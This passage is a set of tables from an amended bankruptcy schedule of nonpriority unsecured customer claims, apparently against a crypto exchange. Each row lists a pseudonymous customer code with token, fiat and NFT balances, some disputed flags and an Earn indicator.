| 07364258 | | BAT[1], BRZ[2], CUSDT[1], DOGE[2], ETH[0], GRT[0], LTC[0], MATIC[0], SOL[0], TRX[2], UNI[0], USD[0.00], USDT[1.06623790] | Yes | |
| 07364259 | | USD[10.00] | | |
| 07364260 | | DAI[0] | | |
| 07364261 | | CUSDT[5], DOGE[0], USD[0.00], USDT[0] | | |
| 07364263 | | BTC[0], DOGE[0], LINK[0], LTC[0], MATIC[0], NFT (47354079199974300/Entrance Voucher #15950)[1], SHIB[19], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07364264 | | BAT[.00047797], BRZ[.25845379], BTC[0.00015894], CAD[0.00], CUSDT[.00009777], SOL[.00000009], TRX[.00001716], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07364265 | | BRZ[3.57979875], BTC[0.01271035], DOGE[4388.25323178], SHIB[2856.37310774], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07364267 | | USD[10.00] | | |
| 07364268 | | BRZ[5.07952967], BTC[.0000002], CUSDT[25], DOGE[1535.33457018], USD[0.01] | Yes | |
| 07364269 | | BAT[0], CUSDT[6], DOGE[342.07163154], GRT[0], LINK[0], TRX[1], UNI[0.00458704], USD[19.32] | Yes | |
| 07364270 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07364271 | | USD[10.00] | | |
| 07364272 | | USD[10.00] | | |
| 07364273 | | USD[10.00] | | |
| 07364274 | | USD[10.00] | | |
| 07364275 | | CUSDT[4], DOGE[1], TRX[1], USD[0.00] | | |
| 07364276 | | BAT[0], BRZ[2.00000074], CUSDT[7], DOGE[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07364277 | | USD[10.00] | | |
| 07364278 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07364280 | | CUSDT[1], USD[10.00] | | |
| 07364281 | | USD[10.00] | | |
| 07364283 | | USD[0.00] | | |
| 07364284 | | USD[10.00] | | |
| 07364285 | | USD[10.00] | | |
| 07364287 | | USD[0.00] | | |
| 07364288 | | USD[10.00] | | |
| 07364290 | | USD[0.00] | Yes | |
| 07364291 | | BTC[.00003895], ETH[7], ETHW[8.04431841], UNI[1.1], USD[0.53] | Yes | |
| 07364292 | | BTC[.00112259], CUSDT[1], DOGE[4.05213569], TRX[1], USD[0.72] | Yes | |
| 07364295 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01], USDT[1.10620034] | Yes | |
| 07364296 | | BRZ[1], DOGE[1.07578349], TRX[1], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07364297 | | DOGE[2889.33045076], TRX[1], USD[0.00] | Yes | |
| 07364298 | | USD[0.00] | | |
| 07364301 | | USD[10.00] | | |
| 07364302 | | CUSDT[2], DOGE[41.87410723], SHIB[1012029.37725378], TRX[2], USD[0.32] | Yes | |
| 07364303 | | USD[10.00] | | |
| 07364304 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364305 | | BRZ[3], DOGE[8], USD[0.00] | | |
| 07364306 | | USD[0.73] | Yes | |
| 07364309 | | DOGE[1], USD[0.00] | | |
| 07364311 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07364312 | | USD[0.00], USDT[9.94506732] | | |
| 07364313 | | USD[10.00] | | |
| 07364314 | | USD[10.00] | | |
| 07364315 | | USD[10.00] | | |
| 07364316 | | CUSDT[12], USD[0.00], USDT[0] | | |
| 07364317 | | CUSDT[13], DOGE[2126.90512325], SHIB[45120.52446769], TRX[3], USD[0.00] | Yes | |
| 07364318 | | USD[10.00] | | |
| 07364319 | | CUSDT[259.26791854], DOGE[92.00543569], USD[0.00] | Yes | |
| 07364320 | | AAVE[0], BAT[1.01173453], BRZ[1], CUSDT[2], DOGE[4], ETH[.00033904], ETHW[.00033904], GRT[0], LINK[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07364321 | | USD[10.00] | | |
| 07364322 | | CUSDT[2], DOGE[1609.33614804], LTC[5.54995567], SHIB[6638723.88734329], SUSHI[25.03141902], TRX[1], USD[0.00] | | |
| 07364323 | | DOGE[2.00666156], USD[0.00] | | |
| 07364324 | | USD[10.00] | | |
| 07364325 | | CUSDT[1], SOL[0.06388954], TRX[1], USD[0.00] | Yes | |
| 07364326 | | USD[10.00] | | |
| 07364327 | | USD[10.00] | | |
| 07364328 | | USD[10.00] | | |
| 07364329 | | USD[0.00] | | |
| 07364330 | | CUSDT[1], DOGE[74.78372054], USD[0.00] | | |
| 07364331 | | USD[10.00] | | |
| 07364333 | | USD[10.00] | | |
| 07364334 | | CUSDT[1], USD[0.00] | | |
| 07364335 | | USD[10.00] | | |
| 07364336 | | USD[0.00], USDT[0.00006234] | | |
| 07364337 | | USD[10.00] | | |
| 07364338 | | CUSDT[4], DOGE[184.80174994], ETH[.02343331], ETHW[.02314603], TRX[466.69389204], USD[0.32] | Yes | |
| 07364339 | | BRZ[1], CUSDT[1], TRX[19.83613516], USD[0.00] | Yes | |
| 07364340 | | USD[10.00] | | |
| 07364341 | | TRX[114.46211675], USD[0.00] | | |
| 07364342 | | CUSDT[4], USD[0.00] | Yes | |
| 07364343 | | USD[10.00] | | |
| 07364344 | | USD[10.00] | | |
| 07364345 | | USD[10.00] | | |
| 07364346 | | CUSDT[2], DOGE[20.29025058], TRX[3], USD[0.01] | | |
| 07364347 | | BRZ[2], BTC[.0000001], CUSDT[5], DOGE[1329.30095951], TRX[894.30480707], USD[0.00] | Yes | |
| 07364348 | | USD[10.00] | | |
| 07364349 | | TRX[61.65417029], USD[0.00] | | |
| 07364350 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07364351 | | BAT[9.56234778], BCH[.25257932], DOGE[14370.7859421], ETH[.00156967], ETHW[.00155998], GRT[1.00498957], LTC[.81491204], SHIB[213156.39547192], SUSHI[1.12434283], TRX[1430.18567011], USD[3.38] | Yes | |
| 07364353 | | CUSDT[0], DAI[.23372731], USD[0.00], USDT[0] | Yes | |
| 07364354 | | USD[10.00] | | |
| 07364356 | | DOGE[55.54546118], KSHIB[178.29938827], MATIC[6.11965255], TRX[101.84944242], USD[0.02] | Yes | |
| 07364357 | | USD[10.00] | | |
| 07364359 | | ETH[.00594432], ETHW[.0587592], USD[0.00] | Yes | |
| 07364360 | | USD[10.00] | | |
| 07364361 | | USD[10.00] | | |
| 07364364 | | TRX[.000004] | | |
| 07364366 | | USD[10.00] | | |
| 07364367 | | USD[10.05] | | |
| 07364368 | | BRZ[3], BTC[0.00118475], CUSDT[7], DOGE[1], MATIC[23.53509711], TRX[6], USD[0.00] | Yes | |
| 07364369 | | USD[10.00] | | |
| 07364370 | | BTC[.00016751], USD[0.26] | Yes | |
| 07364371 | | BTC[.01039564], CUSDT[6], DOGE[1], KSHIB[4149.40169776], SHIB[11737611.07059844], USD[0.01] | Yes | |
| 07364372 | | CUSDT[2], DOGE[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364373 | | BTC[.00018564], TRX[1], USD[0.00] | | |
| 07364374 | | DOGE[89.88944497], USD[0.00] | | |
| 07364375 | | USD[10.00] | | |
| 07364376 | | DOGE[4713.52053873], USD[10.00] | | |
| 07364377 | | BF_POINT[100], BRZ[1], ETH[0.03845167], ETHW[0], GRT[747.55977212], MATIC[0], SHIB[1], SOL[0.00023250], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07364378 | | USD[10.00] | | |
| 07364379 | | USD[10.00] | | |
| 07364380 | | USD[10.65] | Yes | |
| 07364381 | | DOGE[2], ETH[0], NFT (292759041614127948/Solana Surfer #2414)[1], NFT (302874098421852420/Boneworld #8434)[1], NFT (305241291823343294/3D SOLDIER #2669)[1], NFT (327957742123955278/2D SOLDIER #447)[1], NFT (330438536855144984/Ape MAN#155)[1], NFT (333747075256632901/Astral Apes #225)[1], NFT (334373268226315025/Eitbit Ape #6484)[1], NFT (342324475539313241/Careless Cat #547)[1], NFT (342367513760216729/PixelPuffins #1633)[1], NFT (343609137758704688/DarkPunk #4469)[1], NFT (344019303282143778/Ape MAN#148)[1], NFT (361092119527392930/Ape MAN#169)[1], NFT (372942758370666853/Founding Frens Lawyer #272)[1], NFT (383509712423805482/Cyber Samurai #2761)[1], NFT (389493759237464893/Cave World Torch)[1], NFT (393101395964082814/PixelPuffins #326)[1], NFT (395047591450456947/Scuba Sam)[1], NFT (399909708506673813/ApexDucks #4486)[1], NFT (400082423675345082/#8079 Inverse Bear)[1], NFT (406776342705116903/ApexDucks #1502)[1], NFT (421722278191926365/#6241)[1], NFT (437913131067610935/3D SOLDIER #1004)[1], NFT (443438651023704528/PixelPuffins #317)[1], NFT (445608758033500916/SOL BROBOT #4021)[1], NFT (456556835954825176/Animal Gang #130)[1], NFT (460748831782268517/FTX Crypto Cup 2022 Key #2964)[1], NFT (464173134843157311/ALPHA.RONIN #1278)[1], NFT (464549368806854255/Mech #6882)[1], NFT (466343671216217269/Ape MAN#119)[1], NFT (474580040421353922/3D CATPUNK #1127)[1], NFT (477851805720289378/Crypto Caveman #1413)[1], NFT (482936526170572887/2D SOLDIER #776)[1], NFT (493940622904081323/Anti Artist #633)[1], NFT (505455152329322705/Founding Frens Lawyer #651)[1], NFT (522187157389884062/Eitbit Ape #4614)[1], NFT (529668246763389724/#1292 Inverse Bear)[1], NFT (535751203776376179/LightPunk #6933)[1], NFT (542114844648502417/Founding Frens Lawyer #499)[1], NFT (545666456223765445/Angry Rhino #16)[1], NFT (546801236028221356/#4417)[1], NFT (554277635869163579/Careless Cat #161)[1], NFT (556166125219063939/#1451)[1], SUSHI[7], SOL[.00035693], TRX[3], USD[0.00] | Yes | |
| 07364382 | | USD[10.00] | | |
| 07364383 | | USD[10.00] | | |
| 07364384 | | USD[10.00] | | |
| 07364386 | | CUSDT[1], TRX[182.17169427], USD[0.00] | | |
| 07364387 | | DOGE[0], USD[0.01] | | |
| 07364388 | | BRZ[4], CUSDT[5], DOGE[0], USD[0.64] | | |
| 07364390 | | BRZ[1], SHIB[0], TRX[3249.21938656], USD[0.00] | Yes | |
| 07364391 | | CUSDT[2], TRX[344.33847672], USD[0.00] | | |
| 07364393 | | CUSDT[5], DOGE[572.6810273], ETH[.00276424], ETHW[.00272797], TRX[2], USD[0.00] | Yes | |
| 07364394 | | USD[10.00] | | |
| 07364395 | | BTC[0], ETH[0], TRX[0], USD[1.65], USDT[0] | | |
| 07364396 | | USD[10.00] | | |
| 07364397 | | USD[10.00] | | |
| 07364398 | | CUSDT[3], DOGE[1477.2609], TRX[175.44206532], USD[0.00] | | |
| 07364400 | | USD[10.00] | | |
| 07364401 | | DOGE[1], USD[0.01] | | |
| 07364402 | | BRZ[1], BTC[0], DOGE[4.000548], TRX[2], USD[0.03] | Yes | |
| 07364403 | | USD[10.00] | | |
| 07364404 | | CUSDT[9], TRX[1], USD[0.01] | Yes | |
| 07364406 | | BTC[0], USD[0.00] | | |
| 07364407 | | DOGE[26.21004581], USD[0.00] | | |
| 07364408 | | SOL[.38606898], USD[0.00] | Yes | |
| 07364409 | | USD[10.00] | | |
| 07364410 | | TRX[208.30030905], USD[0.00] | | |
| 07364411 | | BTC[0], CUSDT[8], USD[0.00] | Yes | |
| 07364413 | | USD[10.00] | | |
| 07364414 | | CUSDT[4], DOGE[.52390817], TRX[1], USD[0.19] | | |
| 07364416 | | MATIC[8.15389737], USD[0.00] | | |
| 07364417 | | BTC[.00020398], CUSDT[2], DOGE[1385.44797896], ETH[.23683635], ETHW[.23663331], GRT[152.53741259], TRX[906.66530932], USD[0.00] | Yes | |
| 07364418 | | BTC[.00027548], DOGE[543.15423387], ETH[.01572941], ETHW[.01572941], USD[0.00] | | |
| 07364419 | | BTC[.00031838], CUSDT[9], USD[0.00] | Yes | |
| 07364422 | | USD[10.00] | | |
| 07364425 | | SOL[0], USD[0.00], USDT[1.02543197] | Yes | |
| 07364426 | | BRZ[1], DOGE[.00006406], USD[0.59] | | |
| 07364427 | | CUSDT[3], DOGE[18.36123484], USD[0.00] | | |
| 07364428 | | USD[10.00] | | |
| 07364429 | | USD[10.00] | | |
| 07364430 | | USD[10.00] | | |
| 07364433 | | BAT[46.22726029], BRZ[1], CUSDT[12], DOGE[.00889585], TRX[2], USD[0.01] | | |
| 07364434 | | USD[10.00] | | |
| 07364435 | | BRZ[0], DOGE[0], USD[0.03] | | |
| 07364436 | | BRZ[2], CUSDT[10], GRT[1], TRX[8], USD[0.00] | | |
| 07364437 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364438 | | USD[0.00], USDT[0] | | |
| 07364439 | | USD[10.00] | | |
| 07364440 | | BRZ[0], ETH[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07364441 | | DOGE[621.01217661], USD[0.00] | | |
| 07364442 | | USD[10.00] | | |
| 07364443 | | USD[0.00] | | |
| 07364444 | | BRZ[1], USD[0.01] | | |
| 07364445 | | USD[10.00] | | |
| 07364447 | | USD[10.00] | | |
| 07364448 | | USD[10.00] | | |
| 07364449 | | USD[0.00] | | |
| 07364451 | | USD[0.00] | | |
| 07364452 | | USD[10.00] | | |
| 07364455 | | BTC[.00010353] | | |
| 07364456 | | BTC[.0000405], LTC[.00130325], TRX[.281137], USD[0.00], USDT[0] | | |
| 07364457 | | USD[10.00] | | |
| 07364459 | | TRX[1], USD[0.01] | | |
| 07364460 | | USD[0.00] | | |
| 07364461 | | USD[0.00] | | |
| 07364462 | | BAT[1.0165555], CUSDT[9233.72524706], DOGE[632.16622752], GRT[74.64152145], TRX[5157.11278584], USD[11.53] | Yes | |
| 07364464 | | USD[0.01] | Yes | |
| 07364465 | | BTC[0], DAI[0], DOGE[1], TRX[2], USD[0.00] | | |
| 07364466 | | USD[10.00] | | |
| 07364467 | | ALGO[479.19707201], AVAX[0], DOGE[0], ETHW[.11024074], NFT (297941349953479303/Entrance Voucher #29592)[1], USD[41263.29], USDT[0] | Yes | |
| 07364468 | | USD[10.00] | | |
| 07364470 | | USD[10.00] | | |
| 07364471 | | SHIB[902356.16462175], USD[0.00] | Yes | |
| 07364472 | Contingent, Disputed | USD[0.00] | | |
| 07364473 | | SHIB[1], USD[0.00] | | |
| 07364474 | | CUSDT[93.81166651], DOGE[12.78677769], TRX[216.12460713], USD[0.00] | | |
| 07364475 | | USD[0.00] | | |
| 07364476 | | USD[10.00] | | |
| 07364478 | | BRZ[2], CUSDT[6], DOGE[4], GRT[5.25857477], LINK[1.03997315], MATIC[12.8350428], SOL[1.29610123], SUSHI[3.06004837], USD[1.06], USDT[15.59071758] | Yes | |
| 07364480 | | BTC[.0000917], DOGE[52.8637346], ETH[.00028074], ETHW[.00028074], TRX[3], USD[0.00] | Yes | |
| 07364481 | | TRX[1], USD[0.01] | | |
| 07364482 | | BTC[.00020487], USD[0.00] | | |
| 07364483 | Contingent, Disputed | CUSDT[4], ETH[.00000034], ETHW[0.00000033], SOL[.23232216], TRX[6], USD[0.00], USDT[0] | | |
| 07364484 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07364485 | | USD[0.00] | | |
| 07364486 | | USD[10.00] | | |
| 07364487 | | BTC[.00012409], USD[0.00] | | |
| 07364488 | | SHIB[782270.98287379], USD[0.00] | Yes | |
| 07364489 | | BTC[0], DOGE[.12046148], LTC[0], UNI[0], USD[0.00] | | |
| 07364490 | | BTC[.00001016], USD[0.00] | | |
| 07364492 | | BTC[.0005888], ETH[.150259], ETHW[.150259], USD[6.63] | | |
| 07364493 | | CUSDT[1], SUSHI[0.69549730], USD[0.00] | | |
| 07364494 | | USD[10.84] | Yes | |
| 07364495 | | USD[10.87] | Yes | |
| 07364498 | | BF_POINT[500], BRZ[1], CUSDT[1], DOGE[1], ETH[0.50900000], ETHW[0.50900000], SUSHI[0], TRX[2], USD[10.00], USDT[1] | | |
| 07364499 | | BAT[.00002744], BCH[0], BTC[0], DOGE[0], ETH[0.00000133], ETHW[0], LINK[0], LTC[0], MATIC[0], SHIB[184], SOL[0], TRX[3], USD[0.00], USDT[0.00000051] | Yes | |
| 07364503 | | BTC[0], GRT[.433], MATIC[8.19], USD[2752.94] | | |
| 07364504 | | ETH[.00000001], USD[0.00], USDT[0.00000185] | | |
| 07364506 | | AUD[0.00], DOGE[778.20921424], KSHIB[121.70144838], SHIB[558639.08731962], USD[0.00], USDT[0] | Yes | |
| 07364507 | | ETH[.00558595], ETHW[.00558595], USD[0.00] | | |
| 07364510 | | USD[10.00] | | |
| 07364512 | | BRZ[1], BTC[0], CUSDT[475.72563992], DOGE[222.17488585], TRX[1], USD[0.00] | | |
| 07364514 | | DOGE[1077.2988236], USD[10.00] | | |
| 07364515 | | BTC[0], USD[0.01] | | |

Amended Schedule F-15 - Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364516 | | BTC[0], DOGE[.29346039], TRX[145.89468339], USD[0.00] | | |
| 07364517 | | DOGE[148.48592442], USD[0.00] | Yes | |
| 07364519 | | CUSDT[2], USD[0.00] | | |
| 07364520 | | ETH[.000063], ETHW[.000063], GRT[0.06466381], LTC[0.00907123], TRX[0], USD[0.00], USDT[0] | | |
| 07364522 | | CUSDT[6], DOGE[3], ETH[.01882025], ETHW[.01858769], GRT[149.41390359], TRX[4], USD[0.00] | Yes | |
| 07364523 | | USD[10.00] | | |
| 07364524 | | USD[0.01] | | |
| 07364525 | | DOGE[1114.49060399], GRT[0], SHIB[2], SOL[1.01978049], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07364527 | | USD[10.00] | | |
| 07364530 | | USD[10.00] | | |
| 07364531 | | BRZ[1], GRT[3.67613877], SUSHI[2.66039453], USD[0.00] | | |
| 07364532 | | USD[10.00] | | |
| 07364533 | | DOGE[1082.14580589], TRX[1], USD[0.00] | | |
| 07364534 | | USD[10.00] | | |
| 07364535 | | USD[10.00] | | |
| 07364536 | | USD[10.00] | | |
| 07364537 | | CUSDT[8], DOGE[5856.75167366], TRX[3], USD[0.00] | | |
| 07364538 | | USD[10.00] | | |
| 07364540 | | DOGE[162.3010067], SHIB[28452.46087399], USD[0.00] | Yes | |
| 07364542 | | USD[0.00] | | |
| 07364543 | | USD[10.00] | | |
| 07364544 | | CUSDT[1], DOGE[3128.87496614], LTC[.11608096], USD[0.00] | | |
| 07364545 | | USD[10.00] | | |
| 07364546 | | USD[10.00] | | |
| 07364547 | | USD[10.00] | | |
| 07364548 | | USD[10.00] | | |
| 07364550 | | USD[10.00] | | |
| 07364552 | | USD[10.00] | | |
| 07364553 | | USD[10.00] | | |
| 07364554 | | USD[0.00] | | |
| 07364555 | | USD[10.00] | | |
| 07364557 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07364559 | | USD[10.00] | | |
| 07364564 | | USD[10.00] | | |
| 07364565 | | CUSDT[1], DOGE[35.49045287], USD[0.19] | | |
| 07364567 | | CUSDT[1], MATIC[6.69806664], USD[0.00] | | |
| 07364568 | | CUSDT[2], DOGE[2], GRT[1], SHIB[1], SOL[0], TRX[1], USD[0.00], USDT[1] | | |
| 07364569 | | USD[10.00] | | |
| 07364570 | | SHIB[777246.01087906], TRX[1], USD[54.27] | Yes | |
| 07364571 | | BTC[.01064427] | | |
| 07364572 | | ETHW[1.25779337], USD[5.25] | | |
| 07364573 | | USD[10.00] | | |
| 07364574 | | USD[0.00] | | |
| 07364576 | | USD[10.00] | | |
| 07364577 | | USD[10.00] | | |
| 07364578 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07364579 | | BTC[0], DOGE[.00014364], USD[0.01] | | |
| 07364580 | | DOGE[69.30691705], UNI[.27238464], USD[0.00] | Yes | |
| 07364581 | | USD[10.00] | | |
| 07364582 | | DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0] | | |
| 07364584 | | USD[10.00] | | |
| 07364585 | | USD[10.00] | | |
| 07364586 | | USD[10.00] | | |
| 07364588 | | USD[10.00] | | |
| 07364589 | | USD[10.00] | | |
| 07364590 | | BRZ[2], CUSDT[3], DOGE[1], TRX[1683.67316045], USD[0.00] | Yes | |
| 07364591 | | USD[10.00] | | |
| 07364593 | | AVAX[0], BCH[0], BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], LTC[0], MATIC[0], NFT (344408339919643984/Good Boy #44)[1], NFT (383639769133811740/Entrance Voucher #3072)[1], SOL[0], SUSHI[0], USD[0.74], USDT[0.00000001], YFI[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364594 | | USD[0.07] | | |
| 07364595 | | USD[10.00] | | |
| 07364596 | | USD[10.00] | | |
| 07364599 | | AAVE[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], SHIB[530664.15830390], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07364601 | | LINK[.40468506], USD[0.00] | | |
| 07364602 | | USD[10.95] | Yes | |
| 07364603 | | BRZ[1], CUSDT[3], DOGE[2], ETH[0], LTC[0], SOL[0], TRX[3], USD[0.01], USDT[1] | | |
| 07364605 | | BRZ[1], CUSDT[4], DOGE[.00001979], GRT[.00089793], TRX[.000021], USD[0.00] | | |
| 07364606 | | USD[10.00] | | |
| 07364607 | | BAT[3.28129058], CUSDT[18], DOGE[1], GRT[1.00498957], LINK[1.11035004], TRX[7], USD[0.00], USDT[4.44140007] | Yes | |
| 07364608 | | USD[10.00] | | |
| 07364609 | | CUSDT[2], DOGE[3034.52535165], LINK[.5852899], TRX[1], USD[10.32] | | |
| 07364610 | | USD[10.00] | | |
| 07364611 | | USD[10.00] | | |
| 07364613 | | LTC[.04036773], USD[0.00] | | |
| 07364614 | | USD[10.00] | | |
| 07364615 | | CUSDT[1], DOGE[.00003486], TRX[1], USD[40.81] | | |
| 07364616 | | BTC[0], ETH[0.00000001], SOL[0], USD[58810.17], USDT[0.00000042] | | |
| 07364617 | | CUSDT[1], DOGE[304.97592454], USD[20.00] | | |
| 07364618 | | USD[10.00] | | |
| 07364619 | | USD[10.00] | | |
| 07364620 | | USD[10.00] | | |
| 07364621 | | BTC[0], SUSHI[.03] | | |
| 07364622 | | USD[10.00] | | |
| 07364623 | | USD[0.04] | | |
| 07364624 | | USD[10.00] | | |
| 07364625 | | USD[10.00] | | |
| 07364627 | | NFT (29023973093796511/Settler #3768)[1], NFT (32324743299756658/9SOLYETIS #5954)[1], NFT (33152415487026459/Settler #2161)[1], NFT (33432197216227429/Settler #3498)[1], NFT (34996924403887985/Elysian - #6037)[1], NFT (37119069861401692/DOTB #2256)[1], NFT (39334554110094820/3Solninjas #1029)[1], NFT (43101942105051218/DOTB #7231)[1], NFT (51208001546249023/8SharkBro #2879)[1], NFT (53328018264453008/2First 50 #10)[1], SOL[0.01207555], USD[0.00] | | |
| 07364628 | | USD[10.00] | | |
| 07364629 | | DOGE[1], ETHW[5.82049751], KSHIB[0], MATIC[0], SOL[0], USD[0.00] | Yes | |
| 07364630 | | CUSDT[1], USD[0.01], USDT[0] | Yes | |
| 07364631 | | BAT[17.30324108], CUSDT[2], DOGE[69.88339185], GRT[12.93466817], TRX[544.23447072], USD[0.00] | | |
| 07364633 | | USD[10.00] | | |
| 07364634 | | BTC[.00523843], CUSDT[5], DOGE[5064.36415363], ETH[.08290519], ETHW[.08290519], SHIB[1], USD[0.00] | | |
| 07364636 | | BRZ[1], CUSDT[1], DOGE[0], ETH[0], SOL[0], TRX[2], USD[0.00], USDT[1] | | |
| 07364637 | | USD[10.00] | | |
| 07364638 | | USD[10.00] | | |
| 07364639 | | USD[10.00] | | |
| 07364641 | | LINK[.00471769], USD[4.81] | | |
| 07364642 | | CUSDT[3], USD[0.00] | | |
| 07364643 | | LTC[.04896935], USD[0.00] | | |
| 07364644 | | USD[10.00] | | |
| 07364645 | | DOGE[1], NFT (30186837647636437/3DOTB #784)[1], NFT (31572673900555970/5SharkBro #9684)[1], NFT (32966346761192246/6Oink 1324)[1], NFT (33003865355103653/7Battle against the Straw Hats)[1], NFT (33150516973812087/6ApexDucks #7057)[1], NFT (34990928525311535/73D CATPUNK #1443)[1], NFT (35229483829881961/3Baddies #2943)[1], NFT (35699176345921763/9/Common Cryptogram)[1], NFT (39017363422971536/3/Ex Populus Trading Card Game)[1], NFT (39330490224143196/7/DOTB #2799)[1], NFT (40741039670882241/2/SharkBro #5246)[1], NFT (40825738305752933/2/Gangster Gorillas #206)[1], NFT (42602839794098162/2/Astral Apes #1152)[1], NFT (44401213837099658/6Little Rocks #1283)[1], NFT (46425921754090339/7/Fancy Frenchies #6306)[1], NFT (48066407168342445/5/CryptoPet #953)[1], NFT (51046509381139675/1/Common Cryptogram)[1], NFT (51911532976281299/4/Astral Apes #2997)[1], NFT (54122031074641815/5/Little Rocks #1259)[1], NFT (55149208201839450/2/GalaxyKoalas # 525)[1], NFT (55226907512629592/#2040)[1], NFT (55815758750060657/7/DOTB #3053)[1], NFT (57259356770853941/6/GOONEY #3281)[1], SHIB[20189485.69753763], SOL[1.06123114], USD[0.00] | | |
| 07364646 | | USD[0.00] | | |
| 07364647 | | BAT[2], BRZ[1], CUSDT[5], DOGE[1972.23833272], LTC[.19012218], SUSHI[4.25456835], TRX[350.98034425], UNI[1.66650644], USD[0.14] | | |
| 07364649 | | SHIB[1], SOL[2.0676347], USD[14.07] | | |
| 07364650 | | DOGE[1], GRT[2.00506872], SUSHI[.26092933], TRX[26.72900644], USD[0.00] | | |
| 07364652 | | TRX[964.3495081], USD[0.02] | | |
| 07364653 | | CUSDT[1], DOGE[1249.28904749], TRX[1], USD[2.41] | | |
| 07364654 | | USD[10.00] | | |
| 07364655 | | USD[0.00] | | |
| 07364656 | | CUSDT[2], DOGE[76.84221901], USD[0.00] | | |
| 07364659 | | USD[10.00] | | |
| 07364660 | | DOGE[54.59112527], USD[0.82] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364661 | | CUSDT[1], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.00] | | |
| 07364662 | | BRZ[1], CUSDT[6], USD[0.00] | | |
| 07364663 | | DOGE[11.45985907], USD[0.04] | | |
| 07364664 | | SHIB[1021.67471010], USD[0.00], USDT[0] | Yes | |
| 07364665 | | BCH[0.02728857], BTC[0.00111231], DOGE[58.99473249], ETH[0.03318645], ETHW[0.03277605], LTC[.15223907], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07364666 | | BRZ[1], CUSDT[250.61481805], DOGE[212.71063726], TRX[1], USD[90.92] | | |
| 07364667 | | USD[10.00] | | |
| 07364668 | | USD[10.00] | | |
| 07364669 | | USD[10.00] | | |
| 07364670 | | USD[10.92] | Yes | |
| 07364671 | | USD[0.00] | | |
| 07364672 | | BTC[.33011455], DOGE[3982.487613], ETH[13.45780562], ETHW[13.45780562], LINK[85.4145], LTC[10.87439145], SOL[42.75726954], SUSHI[286.04240307], UNI[51.52], USD[0.01] | | |
| 07364673 | | USD[0.00] | Yes | |
| 07364674 | | DOGE[1], GRT[3.91013497], USD[0.00] | | |
| 07364675 | | BTC[0.01427977], DOGE[0], ETH[0.08976154], ETHW[0.08976154], GRT[1], USD[0.01] | | |
| 07364676 | | BAT[1.0165550], CUSDT[3], DOGE[3], USD[0.00] | Yes | |
| 07364678 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07364679 | | BTC[0], CUSDT[0], DOGE[1], ETH[.00000001], GRT[959.63906430], LINK[18.67082286], MATIC[168.28251246], SHIB[1193135.84729700], SOL[0.00000001], SUSHI[127.09615589], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07364680 | | USD[10.00] | | |
| 07364681 | | USD[10.00] | | |
| 07364682 | | USD[0.00] | | |
| 07364684 | | USD[79.52] | | |
| 07364685 | | BTC[.00015187] | | |
| 07364686 | | DOGE[2.00022507], USD[0.00] | Yes | |
| 07364687 | | USD[0.00] | | |
| 07364688 | | CUSDT[6], DOGE[53.25169414], GRT[.00967114], TRX[.00083867], USD[0.00] | Yes | |
| 07364689 | | USD[10.00] | | |
| 07364691 | | USD[10.00] | | |
| 07364692 | | NFT (373407125327136190/Humpty Dumpty #1461)[1] | | |
| 07364693 | | USD[0.00] | | |
| 07364694 | | USD[22.35] | | |
| 07364695 | | USD[10.00] | | |
| 07364696 | | USD[10.00] | | |
| 07364698 | | ETH[0], ETHW[0.05382692], USD[0.06] | | |
| 07364699 | | DOGE[19.89611442], USD[0.00] | | |
| 07364700 | | BRZ[1], CUSDT[221.99742681], DOGE[2222.73114259], TRX[3], USD[0.00], USDT[39.7683417] | | |
| 07364701 | | BRZ[1], CUSDT[3], DOGE[2], SOL[0], USD[0.00] | Yes | |
| 07364702 | | DOGE[2], USD[0.00], USDT[0.00049524] | | |
| 07364703 | | USD[10.00] | | |
| 07364706 | | USD[10.00] | | |
